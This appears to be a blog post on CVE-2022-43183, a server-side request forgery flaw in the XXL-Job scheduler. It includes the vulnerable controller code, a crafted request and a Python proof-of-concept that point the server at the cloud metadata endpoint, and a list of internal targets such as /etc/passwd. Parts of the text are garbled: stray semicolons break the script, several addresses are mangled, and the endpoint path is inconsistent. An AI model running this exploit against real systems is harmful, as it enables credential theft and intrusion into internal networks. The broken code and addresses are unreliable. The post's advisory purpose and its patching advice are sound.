XXL-Job is a popular open-source distributed task scheduling platform used in many production systems. However, security issues can sometimes sneak into even the best frameworks, and CVE-2022-43183 is a prime example. In this post, we'll break down the vulnerability, show you sample exploit code, and explain how you can protect your XXL-Job server.
What is CVE-2022-43183?
CVE-2022-43183 is a Server-Side Request Forgery (SSRF) vulnerability that affects XXL-Job before v2.3.1. The flaw exists in the /admin/controller/JobLogController.java component. It allows attackers to make HTTP requests from the server running XXL-Job to any other server, internal or external. This opens the door for attacks against internal services, potential data leaks, or even lateral movement in your network.
- Official CVE page: CVE-2022-43183 - NVD
- XXL-Job GitHub repo: XXL-Job on GitHub
How Does the Vulnerability Work?
It comes down to how XXL-Job handles incoming URLs when admins want to view job log details. The backend reads log files from given URLs, but does not properly restrict or validate the domains or paths. This makes it possible for an attacker to supply an arbitrary URL, causing the server to fetch data from any location, including localhost or sensitive internal services.
Vulnerable code snippet from JobLogController.java
@RequestMapping("/logDetailCat")
@ResponseBody
public ReturnT<LogResult> logDetailCat(String executorAddress, long triggerTime, long logId, int fromLineNum) {
// ... (omitted)
// Dangerous: makes HTTP request to whatever executorAddress is supplied
String logUrl = executorAddress + "/log?triggerTime=" + triggerTime + "&logId=" + logId + "&fromLineNum=" + fromLineNum;
String response = HttpUtil.get(logUrl); // No validation!
// ... (returns log contents)
}
If executorAddress is attacker-controlled, the code above will make a request to any address the attacker likes.
Scenario
Suppose your XXL-Job admin dashboard is exposed to the internet. An attacker can log in or trick someone with access into visiting a crafted link, or directly make an HTTP request to the endpoint.
Let’s say the attacker wants the XXL-Job server to fetch metadata from a cloud instance
GET /logDetailCat?executorAddress=http://169.254.169.254/latest/meta-data/&triggerTime=1&logId=1&fromLineNum=1 HTTP/1.1
Host: your.xxl-job.server
What happens:
If this request is accepted, the server will query http://169.254.169.254/latest/meta-data/ (the internal AWS metadata endpoint) and the response will be sent back to the attacker.
Similarly, the attacker could access local or private network services such as
- http://localhost:808/private-api
- http://10...5:920/private-elasticsearch
- Even file:///etc/passwd (in some cases, depending on the implementation)
Here’s a simple Python snippet that demonstrates the exploit
import requests
url = "http://target-xxl-job-server/admin/logDetailCat";
payload = {
"executorAddress": "http://169.254.169.254/latest/meta-data/";,
"triggerTime": "1",
"logId": "1",
"fromLineNum": "1"
}
r = requests.get(url, params=payload)
print(r.text) # Will print the server's internal AWS metadata if vulnerable!
Replace target-xxl-job-server with your actual server address.
Real-World Impact
- Cloud Credential Theft: On public clouds, SSRF can let attackers steal instance metadata and credentials.
- Internal Attack Surface Exposure: Attackers can scan or attack internal networks otherwise hidden from the outside world.
- Denial of Service: SSRF can also be used to crash internal services by overloading them with bogus requests.
The XXL-Job maintainers patched this issue in v2.3.1. Upgrade to at least this version or newer!
References
- CVE-2022-43183 - NVD
- XXL-Job Security Advisories
- OWASP SSRF Cheat Sheet
Summary
CVE-2022-43183 is a critical SSRF vulnerability in XXL-Job before v2.3.1. It can let attackers target internal services or cloud metadata endpoints, potentially leading to data theft or further attacks. Patch your XXL-Job deployment now and always be cautious about user-supplied URLs!
Timeline
Published on: 11/17/2022 21:15:00 UTC
Last modified on: 11/21/2022 01:57:00 UTC